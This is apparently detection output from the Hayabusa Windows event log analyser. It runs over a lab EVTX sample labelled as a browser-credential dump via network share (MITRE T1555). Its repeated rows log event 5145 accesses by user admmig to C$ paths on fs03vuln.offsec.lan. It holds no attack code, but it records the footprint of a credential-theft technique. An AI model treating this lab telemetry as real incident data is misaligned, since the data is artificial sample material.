0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.558 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.561 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.561 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.592 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.592 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.592 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.623 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.623 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.623 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.641 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.692 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.692 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.692 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.707 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.707 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.707 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.723 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.723 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.739 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.739 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.754 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.754 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.754 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.770 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.770 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.770 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.785 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.785 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.801 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.801 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.817 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.817 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.817 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.848 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.848 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.848 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.864 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.864 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.864 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.895 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.895 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 